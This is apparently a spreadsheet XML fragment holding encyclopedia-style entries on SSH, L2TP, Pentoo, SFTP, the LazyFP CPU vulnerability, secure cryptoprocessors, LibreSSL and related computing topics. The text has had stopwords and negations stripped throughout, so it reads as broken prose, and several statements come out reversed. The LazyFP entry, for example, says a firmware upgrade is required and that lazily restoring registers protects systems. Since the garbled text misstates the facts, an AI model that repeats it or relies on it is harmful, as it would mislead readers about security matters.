pentium deschutes core flip-chip package full speed cache chip pentium xeon socket 8-compatible module resulted processor could front side bus. this combination brought together attractive aspects pentium pentium xeon: support/improved 16-bit performance full-speed cache, respectively. later "dixon" mobile pentium core would emulate combination full-speed cache. intel's "family/model/stepping" scheme, pentium overdrive family model though based deschutes core, queried cpuid command, identified klamath pentium noted pentium processor update documentation intel, "although processor cpuid 163xh, uses pentium processor cpuid 065xh processor core." major customer production chips sandia national laboratories's asci supercomputer, 4,510 cpus upgraded 1999. after upgrade system world's fastest top500. also intel 80486 overdrive rapidcad references external links intel pentium overdrive (archive.org) pictures pentium overdrive former intel pentium overdrive support page 2013 intel pentium overdrive support page (archive.org)</t>
  </si>
  <si>
    <t>Secure Shell</t>
  </si>
  <si>
    <t>secure shell protocol (ssh) cryptographic network protocol operating network services securely unsecured network. notable applications remote login command-line execution. applications based client–server architecture, connecting client instance server. operates layered protocol suite comprising three principal hierarchical components: transport layer provides server authentication, confidentiality, integrity; user authentication protocol validates user server; connection protocol multiplexes encrypted tunnel multiple logical communication channels.ssh designed unix-like operating systems, replacement telnet unsecured remote unix shell protocols, berkeley remote shell (rsh) related rlogin rexec protocols, insecure, plaintext transmission authentication tokens. first designed 1995 finnish computer scientist tatu ylönen. subsequent development protocol suite proceeded several developer groups, producing several variants implementation. protocol specification distinguishes major versions, referred ssh-1 ssh-2. commonly implemented software stack openssh, released 1999 open-source software openbsd developers. implementations distributed types operating systems common use, including embedded systems. definition uses public-key cryptography authenticate remote computer allow authenticate user, necessary.ssh used several methodologies. simplest manner, ends communication channel automatically generated public-private pairs encrypt network connection, password authenticate user. when public-private pair generated user manually, authentication essentially performed pair created, session opened automatically without password prompt. scenario, public placed computers must allow access owner matching private key, owner keeps private. while authentication based private key, never transferred network authentication. verifies person offering public also owns matching private key. versions important verify unknown public keys, i.e. associate public keys identities, accepting valid. accepting attacker's public without validation authorize unauthorized attacker valid user. authentication: openssh management unix-like systems, list authorized public keys typically stored home directory user allowed remotely, file ~/.ssh/authorized_keys. this file respected writable anything apart owner root. when public present remote matching private present local end, typing password longer required. however, additional security private locked passphrase. private also looked standard places, full path specified command line setting (the option ssh). ssh-keygen utility produces public private keys, always pairs. also supports password-based authentication encrypted automatically generated keys. case, attacker could imitate legitimate server side, password, obtain (man-in-the-middle attack). however, possible sides never authenticated before, remembers server side previously used. client raises warning accepting new, previously unknown server. password authentication disabled server side. typically used remote machine execute commands, also supports tunneling, forwarding ports connections; transfer files using associated file transfer (sftp) secure copy (scp) protocols. uses client–server model. client program typically used establishing connections daemon accepting remote connections. both commonly present modern operating systems, including macos, distributions linux, openbsd, freebsd, netbsd, solaris openvms. notably, versions windows prior windows version 1709 include default. proprietary, freeware open source (e.g. putty, version openssh part cygwin) versions various levels complexity completeness exist. file managers unix-like systems (e.g. konqueror) fish protocol provide split-pane drag-and-drop. open source windows program winscp provides similar file management (synchronization, copy, remote delete) capability using putty back-end. both winscp putty available packaged directly drive, without requiring installation client machine. setting server windows typically involves enabling feature settings app. windows version 1709, official win32 port openssh available. important cloud computing solve connectivity problems, avoiding security issues exposing cloud-based virtual machine directly internet. tunnel provide secure path internet, firewall virtual machine.the iana assigned port port sctp port protocol. iana listed standard port servers well-known ports early 2001. also using sctp rather connection oriented transport layer protocol. historical development version 1995, tatu ylönen, researcher helsinki university technology, finland, designed first version protocol (now called ssh-1) prompted password-sniffing attack university network. goal replace earlier rlogin, telnet, protocols, provide strong authentication guarantee confidentiality. ylönen released implementation freeware july 1995, tool quickly gained popularity. towards 1995, user base grown 20,000 users fifty countries.in december 1995, ylönen founded communications security market develop ssh. original version software used various pieces free software, libgmp, later versions released communications security evolved increasingly proprietary software. estimated 2000 number users grown million. version "secsh" official internet engineering task force's (ietf) name ietf working group responsible version protocol. 2006, revised version protocol, ssh-2, adopted standard. this version incompatible ssh-1. ssh-2 features security feature improvements ssh-1. better security, example, comes diffie–hellman exchange strong integrity checking message authentication codes. features ssh-2 include ability number shell sessions single connection. ssh-2's superiority popularity ssh-1, implementations libssh (v0.8.0+), dropbear support ssh-2 protocol. version 1.99 january 2006, well version established, 4253 specified server supporting well prior versions identify protocol version 1.99. this version number reflect historical software revision, method identify backward compatibility. openssh ossh 1999, developers, desiring availability free software version, restarted software development 1.2.12 release original program, last released open source license. this served code base björn grönvall's ossh software. shortly thereafter, openbsd developers forked grönvall's code created openssh, shipped release openbsd. from version, "portability" branch formed port openssh operating systems.as 2005, openssh single popular implementation, default version large number operating system distributions. ossh meanwhile become obsolete. openssh continues maintained supports ssh-2 protocol, expunged ssh-1 support codebase openssh release. uses protocol used many applications across many platforms including unix variants (linux, bsds including apple's macos, solaris), well microsoft windows. some applications require features available compatible specific clients servers. example, using protocol implement possible, presently openssh server client implementation. login shell remote host (replacing telnet rlogin) executing single command remote host (replacing rsh) setting automatic (passwordless) login remote server (for example, using openssh) combination rsync back copy mirror files efficiently securely forwarding port tunneling (not confused vpn, routes packets different networks, bridges broadcast domains one). using full-fledged encrypted vpn. note openssh server client supports feature. forwarding remote host (possible multiple intermediate hosts) browsing encrypted proxy connection clients support socks protocol. securely mounting directory remote server filesystem local computer using sshfs. automated remote monitoring management servers mechanisms discussed above. development mobile embedded device supports ssh. securing file transfer protocols. file transfer protocols secure shell protocols used several file transfer mechanisms. secure copy (scp), evolved protocol rsync, intended efficient scp. generally runs connection. file transfer protocol (sftp), secure alternative (not confused ftps) files transferred shell protocol (a.k.a. fish), released 1998, evolved unix shell commands fast secure protocol (fasp), aspera, uses control ports data transfer. architecture protocol layered architecture three separate components: transport layer (rfc 4253) typically uses transmission control protocol (tcp) tcp/ip, reserving port number server listening port. this layer handles initial exchange well server authentication, sets encryption, compression, integrity verification. exposes upper layer interface sending receiving plaintext packets size 32,768 bytes each, allowed implementation. transport layer also arranges re-exchange, usually data transferred hour passed, whichever occurs first. user authentication layer (rfc 4252) handles client authentication, provides suite authentication algorithms. authentication client-driven: prompted password, client prompting, server. server merely responds client's authentication requests. widely used user-authentication methods include following: password: method straightforward password authentication, including facility allowing password changed. programs implement method. publickey: method public-key-based authentication, usually supporting least dsa, ecdsa keypairs, implementations also supporting x.509 certificates. keyboard-interactive (rfc 4256): versatile method server sends prompts enter information client displays sends back responses keyed-in user. used provide one-time password authentication s/key securid. used openssh configurations underlying host-authentication provider effectively provide password authentication, sometimes leading inability client supports plain password authentication method. gssapi authentication methods provide extensible scheme perform authentication using external mechanisms kerberos ntlm, providing single sign-on capability sessions. these methods usually implemented commercial implementations organizations, though openssh working gssapi implementation. connection layer (rfc 4254) defines concept channels, channel requests, global requests, define services provided. single connection multiplexed multiple logical channels simultaneously, transferring data bidirectionally. channel requests used relay out-of-band channel-specific data, changed size terminal window, exit code server-side process. additionally, channel performs flow control using receive window size. client requests server-side port forwarded using global request. standard channel types include: shell terminal shells, sftp exec requests (including transfers) direct-tcpip client-to-server forwarded connections forwarded-tcpip server-to-client forwarded connections sshfp record (rfc 4255) provides public host fingerprints order verifying authenticity host.this open architecture provides considerable flexibility, allowing variety purposes beyond secure shell. functionality transport layer alone comparable transport layer security (tls); user-authentication layer highly extensible custom authentication methods; connection layer provides ability multiplex many secondary sessions single connection, feature comparable beep available tls. algorithms eddsa, ecdsa, public-key cryptography. ecdh diffie–hellman exchange. hmac, aead umac mac. (and deprecated rc4, 3des, des) symmetric encryption. aes-gcm chacha20-poly1305 aead encryption. (and deprecated md5) fingerprint. vulnerabilities ssh-1 1998, vulnerability described allowed unauthorized insertion content encrypted stream insufficient data integrity protection crc-32 used version protocol. known compensation attack detector introduced implementations. many updated implementations contained integer overflow vulnerability allowed attackers execute arbitrary code privileges daemon, typically root. january 2001 vulnerability discovered allows attackers modify last block idea-encrypted session. month, another vulnerability discovered allowed malicious server forward client authentication another server.since ssh-1 inherent design flaws make vulnerable, generally considered obsolete avoided explicitly disabling fallback ssh-1. most modern servers clients support ssh-2. plaintext recovery november 2008, theoretical vulnerability discovered versions allowed recovery bits plaintext block ciphertext encrypted using standard default encryption mode, cbc. straightforward solution ctr, counter mode, instead mode, since renders resistant attack. suspected decryption december 2014 spiegel published classified information leaked whistleblower edward snowden suggests national security agency able decrypt traffic. technical details associated process disclosed. 2017 analysis hacking tools bothanspy gyrfalcon suggested protocol compromised. standards documentation following publications ietf "secsh" working group document ssh-2 proposed internet standard. 4250 secure shell (ssh) protocol assigned numbers 4251 secure shell (ssh) protocol architecture 4252 secure shell (ssh) authentication protocol 4253 secure shell (ssh) transport layer protocol 4254 secure shell (ssh) connection protocol 4255 using securely publish secure shell (ssh) fingerprints 4256 generic message exchange authentication secure shell protocol (ssh) 4335 secure shell (ssh) session channel break extension 4344 secure shell (ssh) transport layer encryption modes 4345 improved arcfour modes secure shell (ssh) transport layer protocolthe protocol specifications later updated following publications: 4419 diffie-hellman group exchange secure shell (ssh) transport layer protocol (march 2006) 4432 exchange secure shell (ssh) transport layer protocol (march 2006) 4462 generic security service application program interface (gss-api) authentication exchange secure shell (ssh) protocol (may 2006) 4716 secure shell (ssh) public file format (november 2006) 4819 secure shell public subsystem (march 2007) 5647 galois counter mode secure shell transport layer protocol (august 2009) 5656 elliptic curve algorithm integration secure shell transport layer (december 2009) 6187 x.509v3 certificates secure shell authentication (march 2011) 6239 suite cryptographic suites secure shell (ssh) (may 2011) 6594 sha-256 algorithm rsa, digital signature algorithm (dsa), elliptic curve (ecdsa) sshfp resource records (april 2012) 6668 sha-2 data integrity verification secure shell (ssh) transport layer protocol (july 2012) 7479 ed25519 sshfp resource records (march 2015) 5592 secure shell transport model simple network management protocol (snmp) (june 2009) 6242 using netconf protocol secure shell (ssh) (june 2011) 8332 keys sha-256 sha-512 secure shell (ssh) protocol (march 2018) draft-gerhards-syslog-transport-ssh-00 transport mapping syslog (july 2006) draft-ietf-secsh-filexfer-13 file transfer protocol (july 2006)in addition, openssh project includes several vendor protocol specifications/extensions: openssh protocol overview openssh certificate/key overview draft-miller-ssh-agent-04 agent protocol (december 2019) also brute-force attack comparison clients comparison servers corkscrew ident openssh secure shell tunneling web-based references further reading barrett, daniel silverman, richard byrnes, robert (2005). ssh: secure shell (the definitive guide) (2nd ed.). o'reilly. isbn 0-596-00895-3. stahnke, michael (2005). openssh. apress. isbn 1-59059-476-2. tatu ylönen july 1995). "announcement: (secure shell) remote login program". comp.security.unix. original announcement dwivedi, himanshu (2003). implementing ssh. wiley. isbn 978-0-471-45880-7. external links protocols joseph; susoy (november 2013). p6r's secure shell public subsystem. doi:10.17487/rfc7076. 7076.</t>
  </si>
  <si>
    <t>Pentoo</t>
  </si>
  <si>
    <t>pentoo live live designed penetration testing security assessment. based gentoo linux, pentoo provided 64-bit installable live pentoo also available overlay existing gentoo installation. features packet injection patched wi-fi drivers, gpgpu cracking software, many tools penetration testing security assessment. pentoo kernel includes grsecurity hardening extra patches binaries compiled hardened toolchain latest nightly versions tools available. features available 32-bit 64-bit versions, latter significant speed increase bits includes required environment crack passwords using gpgpu opencl cuda configured 'out box' built hardened linux, including hardened kernel toolchain hardened kernel extra patches uses pentoo overlay, allows tools built standard gentoo build support full disk encryption luks installed automated installation tools tools installed versioned ebuilds open-ended ebuilds, making possible pull latest subversions still installs tracked package management. following tool categories included: analyzer bluetooth cracker database development exploit footprint forensics forging fuzzers misc mitm pentoo proxy scanner sip-voip wireless releases pentoo uses rolling releases periodic snapshots latest committed updates. references external links official website official blog pentoo distrowatch pentoo opensourcefeed gallery shmoocon 2010 firetalks presentation: pentoo bsides delaware 2013 presentation: pentoo report bugs working betas</t>
  </si>
  <si>
    <t>Layer 2 Tunneling Protocol</t>
  </si>
  <si>
    <t>computer networking, layer tunneling protocol (l2tp) tunneling protocol used support virtual private networks (vpns) part delivery services isps. uses encryption ('hiding') control messages (using optional pre-shared secret), provide encryption confidentiality content itself. rather, provides tunnel layer (which encrypted), tunnel passed layer encryption protocol ipsec. history published 2000 proposed standard 2661, l2tp origins primarily older tunneling protocols point-to-point communication: cisco's layer forwarding protocol (l2f) microsoft'spoint-to-point tunneling protocol (pptp). version protocol, l2tpv3, appeared proposed standard 3931 2005. l2tpv3 provides additional security features, improved encapsulation, ability carry data links simply point-to-point protocol (ppp) network (for example: frame relay, ethernet, atm, etc.). description entire l2tp packet, including payload l2tp header, sent within user datagram protocol (udp) datagram. virtue transmission (rather tcp) avoids "tcp meltdown problem". common carry sessions within l2tp tunnel. l2tp provide confidentiality strong authentication itself. ipsec often used secure l2tp packets providing confidentiality, authentication integrity. combination protocols generally known l2tp/ipsec (discussed below). endpoints l2tp tunnel called l2tp access concentrator (lac) l2tp network server (lns). waits tunnels. once tunnel established, network traffic peers bidirectional. useful networking, higher-level protocols l2tp tunnel. facilitate this, l2tp session established within tunnel higher-level protocol ppp. either initiate sessions. traffic session isolated l2tp, possible multiple virtual networks across single tunnel. packets exchanged within l2tp tunnel categorized either control packets data packets. l2tp provides reliability features control packets, reliability data packets. reliability, desired, must provided nested protocols running within session l2tp tunnel. l2tp allows creation virtual private dialup network (vpdn) connect remote client corporate network using shared infrastructure, could internet service provider's network. tunneling models l2tp tunnel extend across entire session across segment two-segment session. this represented four different tunneling models, namely: voluntary tunnel compulsory tunnel incoming call compulsory tunnel remote dial l2tp multihop connection l2tp packet structure l2tp packet consists field meanings: flags version control flags indicating data/control packet presence length, sequence, offset fields. length (optional) total length message bytes, present length flag set. tunnel indicates identifier control connection. session indicates identifier session within tunnel. (optional) sequence number data control message, beginning zero incrementing (modulo 216) message sent. present sequence flag set. (optional) sequence number expected message received. last in-order message received plus (modulo 216). data messages, reserved and, present indicated bit), must ignored upon receipt.. offset size (optional) specifies payload data located past l2tp header. offset field present, l2tp header ends last byte offset padding. this field exists offset flag set. offset (optional) variable length, specified offset size. contents field undefined. payload data variable length (max payload size size packet size l2tp header) l2tp packet exchange time setup l2tp connection, many control packets exchanged server client establish tunnel session direction. peer requests peer assign specific tunnel session control packets. then using tunnel session data packets exchanged compressed frames payload. list l2tp control messages exchanged lns, handshaking establishing tunnel session voluntary tunneling method l2tp/ipsec because lack confidentiality inherent l2tp protocol, often implemented along ipsec. this referred l2tp/ipsec, standardized ietf 3193. process setting l2tp/ipsec follows: negotiation ipsec security association (sa), typically internet exchange (ike). this carried port 500, commonly uses either shared password (so-called "pre-shared keys"), public keys, x.509 certificates ends, although keying methods exist. establishment encapsulating security payload (esp) communication transport mode. protocol number (compare tcp's udp's 17). point, secure channel established, tunneling taking place. negotiation establishment l2tp tunnel endpoints. actual negotiation parameters takes place sa's secure channel, within ipsec encryption. l2tp uses port 1701.when process complete, l2tp packets endpoints encapsulated ipsec. since l2tp packet wrapped hidden within ipsec packet, original source destination address encrypted within packet. also, necessary open port 1701 firewalls endpoints, since inner packets acted upon ipsec data decrypted stripped, takes place endpoints. potential point confusion l2tp/ipsec terms tunnel secure channel. term tunnel-mode refers channel allows untouched packets network transported another network. case l2tp/ppp, allows l2tp/ppp packets transported secure channel refers connection within confidentiality data guaranteed. l2tp/ipsec, first ipsec provides secure channel, l2tp provides tunnel. ipsec also specifies tunnel protocol: used l2tp tunnel used. windows implementation windows native support (configurable control panel) l2tp since windows 2000. windows vista added alternative tools, snap-in called "windows firewall advanced security" (wfwas) "netsh advfirewall" command-line tool. limitation wfwas netsh commands servers must specified address. windows added "add-vpnconnection" "set-vpnconnectionipsecconfiguration" powershell commands. registry must created client server server behind nat-t device. l2tp isps' networks l2tp often used isps internet service example adsl cable resold. from user, packets travel wholesale network service provider's network server called broadband remote access server (bras), protocol converter router combined. legacy networks path user customer premises' equipment bras network. from network, l2tp tunnel runs bras (acting lac) edge router boundary ultimate destination isp's network. example reseller isps using l2tp. references 2341 cisco layer forwarding (protocol) "l2f" predecessor l2tp) 2637 point-to-point tunneling protocol (pptp) 2661 layer tunneling protocol "l2tp" 2809 implementation l2tp compulsory tunneling radius 2888 secure remote access l2tp 3070 layer tunneling protocol (l2tp) frame relay 3145 l2tp disconnect cause information 3193 securing l2tp using ipsec 3301 layer tunneling protocol (l2tp): access network 3308 layer tunneling protocol (l2tp) differentiated services 3355 layer tunneling protocol (l2tp) over adaptation layer (aal5) 3371 layer tunneling protocol "l2tp" management information base 3437 layer tunneling protocol extensions link control protocol negotiation 3438 layer tunneling protocol (l2tp) internet assigned numbers: internet assigned numbers authority (iana) considerations update 3573 signaling modem-on-hold status layer tunneling protocol (l2tp) 3817 layer tunneling protocol (l2tp) active discovery relay ethernet (pppoe) 3931 layer tunneling protocol version (l2tpv3) 4045 extensions support efficient carrying multicast traffic layer-2 tunneling protocol (l2tp) 4951 fail over extensions layer tunneling protocol (l2tp) "failover" also ipsec layer forwarding protocol point-to-point tunneling protocol point-to-point protocol virtual extensible references external links implementations cisco: cisco l2tp documentation, also read technology brief cisco open source linux: xl2tpd, linux rp-l2tp, openl2tp, l2tpns, l2tpd (inactive), linux l2tp/ipsec server, freebsd multi-link daemon, openbsd npppd(8), accel-ppp pptp/l2tp/pppoe server linux microsoft: built-in client included windows 2000 higher; microsoft l2tp/ipsec client windows 98/windows me/windows apple: built-in client included 10.3 higher. vpdn cisco.com other iana assigned numbers l2tp l2tp extensions working group (l2tpext) (where future standardization work coordinated) using linux l2tp/ipsec client l2tp/ipsec openbsd npppd comparison l2tp, pptp openvpn</t>
  </si>
  <si>
    <t>Layer four traceroute</t>
  </si>
  <si>
    <t>layer four traceroute (lft) fast, multi-protocol traceroute engine, also implements numerous features including number lookups regional internet registries reliable sources, loose source routing, firewall load balancer detection, etc. best known network security practitioners trace route destination host many configurations packet-filters firewalls, detect network connectivity, performance latency problems. works sends various probes (differing jacobson's udp-based method) probes utilizing protocol time live field attempts elicit icmp time_exceeded response gateway along path host. also listens various tcp, udp, icmp messages along assist network managers ascertaining per-protocol heuristic routing information, optionally retrieve various information networks traverses. operation layer four traceroute described detail several prominent security books. origins command first appeared 1998 fft. renamed result confusion fast fourier transforms, stands layer four traceroute. results often referred layer four trace. also prefix whois sources external links layer four traceroute project</t>
  </si>
  <si>
    <t>Secure file transfer program</t>
  </si>
  <si>
    <t>sftp command-line interface client program transfer files using file transfer protocol (sftp), runs inside encrypted secure shell connection. provides interactive interface similar traditional command-line clients. common implementation sftp part openssh project. there command-line sftp clients different names, lftp, psftp pscp (from putty package) winscp. also file transfer protocol comparison servers comparison clients references</t>
  </si>
  <si>
    <t>Lazy FP state restore</t>
  </si>
  <si>
    <t>lazy state leak (cve-2018-3665), also referred lazy state restore lazyfp, security vulnerability affecting intel core cpus. vulnerability caused combination flaws speculative execution technology present within affected cpus certain operating systems handle context switching floating point unit (fpu). exploiting vulnerability, local process leak content registers belong another process. this vulnerability related spectre meltdown vulnerabilities publicly disclosed january 2018. announced intel june 2018, discovered employees amazon, cyberus technology sysgo.besides used floating point arithmetic, registers also used purposes, including storing cryptographic data using instruction set, present many intel cpus. this means vulnerability allow material compromised. mechanism floating point simd registers large, used every task thread) system. make context switching faster, common microprocessors support lazy state switching. rather storing full state context switch, operating system simply mark "not available" hopes switched-to task need operating system guessed correctly, time saved. guess wrong, first simd instruction cause trap operating system, save state previous task load correct state current task. out-of-order cpus, "fpu available" condition detected immediately. fact, almost cannot detected immediately, multiple fault-causing instructions executing simultaneously processor must take first fault encountered preserve illusion in-order execution. information first available in-order retire stage.) processor speculatively executes instruction using previous task's register contents, following instructions, later detects available condition. although architectural state reverted beginning faulting instruction, possible part state address memory load, triggering load processor's cache. exploitation follows pattern spectre-family vulnerabilities: cache state architectural state (the cache affect speed, correctness), cache load undone address, including part previous task's register state, later detected measuring time taken access different memory addresses. possible exploit without actually triggering operating system traps. placing access shadow forced branch misprediction (e.g. using retpoline) processor still speculatively execute code, rewind mispredicted branch never actually execute operating system trap. this allows attack rapidly repeated, quickly reading entire simd register state. mitigation possible mitigate vulnerability operating system hypervisor levels always restoring state switching process contexts. with fix, firmware upgrade required. some operating systems already lazily restore registers default, protecting operating systems affected hardware platforms, even underlying hardware issue existed. linux operating system using kernel higher, possible force kernel eagerly restore registers using eagerfpu=on kernel parameter. also, many system software vendors projects, including linux distributions, openbsd, released patches address vulnerability. notes also transient execution vulnerabilities references external links lazyfp: leaking register state using microarchitectural side-channel, julian stecklina thomas prescher (research paper) intel lazyfp vulnerability: exploiting lazy state switching, thomas prescher, julian stecklina jacek galowicz (cyberus technology) lazy state restore (intel security advisory) theo raadt openbsd explains lazy state vulnerability youtube</t>
  </si>
  <si>
    <t>Lazy replication</t>
  </si>
  <si>
    <t>Secure environment</t>
  </si>
  <si>
    <t>computing, secure environment system implements controlled storage information. event computing data loss, secure environment used protect personal and/or confidential data. often, secure environments employ cryptography means protect information. some secure environments employ cryptographic hashing, simply verify information altered since last modified. also data recovery cleanroom mandatory access control (mac) trusted computing homomorphic encryption</t>
  </si>
  <si>
    <t>Secure cryptoprocessor</t>
  </si>
  <si>
    <t>secure cryptoprocessor dedicated computer-on-a-chip microprocessor carrying cryptographic operations, embedded packaging multiple physical security measures, give degree tamper resistance. unlike cryptographic processors output decrypted data onto secure environment, secure cryptoprocessor output decrypted data decrypted program instructions environment security cannot always maintained. purpose secure cryptoprocessor keystone security subsystem, eliminating need protect rest subsystem physical security measures. examples hardware security module (hsm) contains secure cryptoprocessor chips. these devices high grade secure cryptoprocessors used enterprise servers. hardware security module multiple levels physical security single-chip cryptoprocessor secure component. cryptoprocessor reveal keys executable instructions bus, except encrypted form, zeros keys attempts probing scanning. crypto chip(s) also potted hardware security module processors memory chips store process encrypted data. attempt remove potting cause keys crypto chip zeroed. hardware security module also part computer (for example atm) operates inside locked safe deter theft, substitution, tampering. modern smartcards probably widely deployed form secure cryptoprocessor, although complex versatile secure cryptoprocessors widely deployed systems automated teller machines, set-top boxes, military applications, high-security portable communication equipment. some secure cryptoprocessors even general-purpose operating systems linux inside security boundary. cryptoprocessors input program instructions encrypted form, decrypt instructions plain instructions executed within cryptoprocessor chip decrypted instructions inaccessibly stored. never revealing decrypted program instructions, cryptoprocessor prevents tampering programs technicians legitimate access sub-system data bus. this known encryption. data processed cryptoprocessor also frequently encrypted. trusted platform module (tpm) implementation secure cryptoprocessor brings notion trusted computing ordinary enabling secure environment. present implementations focus providing tamper-proof boot environment, persistent volatile storage encryption. security chips embedded systems also available provide level physical protection keys secret material smartcard processor smaller, less complex less expensive package. they often referred cryptographic authentication devices used authenticate peripherals, accessories and/or consumables. like tpms, usually turnkey integrated circuits intended embedded system, usually soldered board. features security measures used secure cryptoprocessors: tamper-detecting tamper-evident containment. conductive shield layers chip prevent reading internal signals. controlled execution prevent timing delays revealing secret information. automatic zeroization secrets event tampering. chain trust boot-loader authenticates operating system loading chain trust operating system authenticates application software loading hardware-based capability registers, implementing one-way privilege separation model. degree security secure cryptoprocessors, useful, invulnerable attack, particularly well-equipped determined opponents (e.g. government intelligence agency) willing expend enough resources project.one attack secure cryptoprocessor targeted 4758. team university cambridge reported successful extraction secret information 4758, using combination mathematics, special-purpose codebreaking hardware. however, attack practical real-world systems required attacker full access functions device. normal recommended practices integral access control system split authority person could mount attack.while vulnerability exploited flaw software loaded 4758, architecture 4758 itself, attack serves reminder security system secure weakest link: strong link 4758 hardware rendered useless flaws design specification software loaded smartcards significantly vulnerable, open physical attack. additionally, hardware backdoors undermine security smartcards cryptoprocessors unless investment made anti-backdoor design methods.in case full disk encryption applications, especially implemented without boot pin, cryptoprocessor would secure cold boot attack data remanence could exploited dump memory contents operating system retrieved cryptographic keys tpm. however, sensitive data stored cryptoprocessor memory external storage, cryptoprocessor designed unable reveal keys decrypted unencrypted data chip bonding pads solder bumps, protected data would accessible probing cryptoprocessor chip removing packaging metal shielding layers cryptoprocessor chip. this would require physical possession device well skills equipment beyond technical personnel. other attack methods involve carefully analyzing timing various operations might vary depending secret value mapping current consumption versus time identify differences bits handled internally bits. attacker apply temperature extremes, excessively high clock frequencies supply voltage exceeds specifications order induce fault. internal design cryptoprocessor tailored prevent attacks. some secure cryptoprocessors contain dual processor cores generate inaccessible encryption keys needed even circuitry reverse engineered, reveal keys necessary securely decrypt software booted encrypted flash memory communicated cores.the first single-chip cryptoprocessor design copy protection personal computer software (see patent 4,168,396, sept 1979) inspired bill gates's open letter hobbyists. history hardware security module (hsm), type secure cryptoprocessor, invented egyptian-american engineer mohamed atalla, 1972. invented high security module dubbed "atalla box" encrypted messages, protected offline devices un-guessable pin-generating key. 1972, filed patent device. founded atalla corporation (now utimaco atalla) year, commercialized "atalla box" following year, officially identikey system. card reader customer identification system, consisting card reader console, customer pads, intelligent controller built-in electronic interface package. allowed customer type secret code, transformed device, using microprocessor, another code teller. during transaction, customer's account number read card reader. success, wide high security modules.fearful atalla would dominate market, banks credit card companies began working international standard 1970s. 3624, launched late 1970s, adopted similar verification process earlier atalla system. atalla early competitor banking security market.at national association mutual savings banks (namsb) conference january 1976, atalla unveiled upgrade identikey system, called interchange identikey. added capabilities processing online transactions dealing network security. designed focus taking bank transactions online, identikey system extended shared-facility operations. consistent compatible various switching networks, capable resetting electronically 64,000 irreversible nonlinear algorithms directed card data information. interchange identikey device released march 1976. later 1979, atalla introduced first network security processor (nsp). atalla's products protect million card transactions every 2013, secure majority world's transactions 2014. also computer security crypto-shredding fips 140-2 hardware acceleration ssl/tls accelerator hardware security modules security engineering smart card trusted computing trusted platform module secure enclave titan references further reading</t>
  </si>
  <si>
    <t>LibreSSL</t>
  </si>
  <si>
    <t>libressl open-source implementation transport layer security (tls) protocol. implementation named secure sockets layer (ssl), deprecated predecessor tls, support removed release 2.3.0. openbsd project forked libressl openssl 1.0.1g april 2014 response heartbleed security vulnerability, goals modernizing codebase, improving security, applying development best practices. history after heartbleed security vulnerability discovered openssl, openbsd team audited codebase decided necessary fork openssl remove dangerous code. libressl.org domain registered april 2014; project announced name april 2014. first week development, 90,000 lines code removed. unused code removed, support obsolete operating systems removed. libressl initially developed intended replacement openssl openbsd 5.6, ported platforms stripped-down version library stable. april 2014, project seeking "stable commitment" external funding. 2014, beck presented "libressl: first days, what future holds" 2014 bsdcan conference, described progress made first month. june 2014, several openssl bugs became public. while several projects notified advance, libressl not; theo raadt accused openssl developers intentionally withholding information openbsd libressl.on june 2014, google created another fork openssl called boringssl, promised exchange fixes libressl. google already relicensed contributions license, requested libressl developers. june 2014, theo raadt welcomed boringssl outlined plans libressl-portable. starting july, code porting macos solaris began, initial porting linux began june.as 2021, openbsd uses libressl primary library. alpine linux supported libressl primary library three years, release 3.9.0 january 2019. gentoo supported libressl february 2021. python 3.10 drops libressl support supported since python 3.4.3 (2015). adoption libressl default provider for: dragonfly openbsd hyperbola gnu/linux-libre macos openssh windowslibressl default provider now-discontinued systems: openelec trueos packageslibressl selectable provider for: freebsd packages gentoo packages (support dropped february 2021) opnsense packages (will dropped 22.7) changes memory-related changes include replacement custom memory calls ones standard library (for example, strlcpy, calloc, asprintf, reallocarray, etc.). this process help later catch buffer overflow errors advanced memory analysis tools observing program crashes (via aslr, bit, stack canaries, etc.). fixes potential double free scenarios also cited commit logs (including explicit assignments null pointer values). there extra sanity checks also cited commit logs related ensuring length arguments, unsigned-to-signed variable assignments, pointer values, method returns. proactive measures order maintain good programming practice, number compiler options flags designed safety enabled default help spotting potential issues fixed earlier (-wall, -werror, -wextra, -wuninitialized). there also code readability updates help future contributors verifying program correctness (knf, white-space, line-wrapping, etc.). modification removal unneeded method wrappers macros also help code readability auditing (error abstraction library references). changes made ensure libressl year 2038 compatible along maintaining portability similar platforms. addition, explicit_bzero bn_clear calls added prevent compiler optimizing prevent attackers reading previously allocated memory. cryptographic there changes help ensure proper seeding random number generator-based methods replacements insecure seeding practices (taking advantage features offered kernel natively). terms notable additions made, openbsd added support newer reputable algorithms (chacha stream cipher poly1305 message authentication code) along safer elliptic curves (brainpool curves 5639, bits strength). added features initial release libressl added number features: chacha poly1305 algorithm, brainpool anssi elliptic curves, aes-gcm chacha20-poly1305 aead modes. later versions added following: 2.1.0: automatic ephemeral keys. 2.1.2: built-in arc4random implementation macos freebsd. 2.1.2: reworked gost cipher suite support. 2.1.3: alpn support. 2.1.3: support sha-256 camellia cipher suites. 2.1.4: tls_fallback_scsv server-side support. 2.1.4: certhash replacement c_rehash script. 2.1.4: x509_store_load_mem loading certificates memory (enhance chroot support). 2.1.4: experimental windows binaries. 2.1.5: minor update mainly improving windows support, first working 64-bit binaries. 2.1.6: libtls declared stable enabled default. 2.2.0: cygwin support. 2.2.1: addition ec_curve_nid2nist ec_curve_nist2nid openssl, initial windows xp/2003 support. 2.2.2: defines libressl_version_number, added tls_*methods replacement sslv23_*method calls, cmake build support. insecure features initial release libressl disabled number features default. some code features later removed, including kerberos, us-export ciphers, compression, dtls heartbeat, later versions disabled features: 2.1.1: following discovery poodle vulnerability legacy protocol, libressl disables default. 2.1.3: gost 34.10-94 signature authentication. 2.2.1: removal dynamic engine mdc-2des support 2.2.2: removal openssl binary, removal internet explorer workarounds, rsax engine. 2.3.0: complete removal 3.0, sha-0 dtls1_bad_ver. code removal initial release libressl removed number features deemed insecure, unnecessary deprecated part openbsd 5.6. response heartbleed, heartbeat functionality first features removed. unneeded platforms (classic netware, os/2, openvms, 16-bit windows, etc.) removed. support platforms exist, big-endian i386 amd64. support compilers. 4758, broadcom ubsec, sureware, nuron, gost, gmp, cswift, chil, capi, atalla engines removed irrelevance hardware dependency non-free libraries. openssl prng removed (and replaced chacha20-based implementation arc4random). preprocessor macros deemed unnecessary insecure already deprecated openssl long time (e.g. des_old.h). older unneeded files assembly language, perl (e.g. egd). md2, seed functionality. 3.0, sha-0, dtls1_bad_verthe dual drbg algorithm, suspected back door, along support fips 140-2 standard required unused protocols insecure algorithms also removed, including support fips 140-2, md4/md5 j-pake, srp. backlog complaints openssl number open bugs reported tracker gone unfixed years. older bugs fixed libressl. also comparison implementations openssh wolfssh references external links official website libressl libtls source code 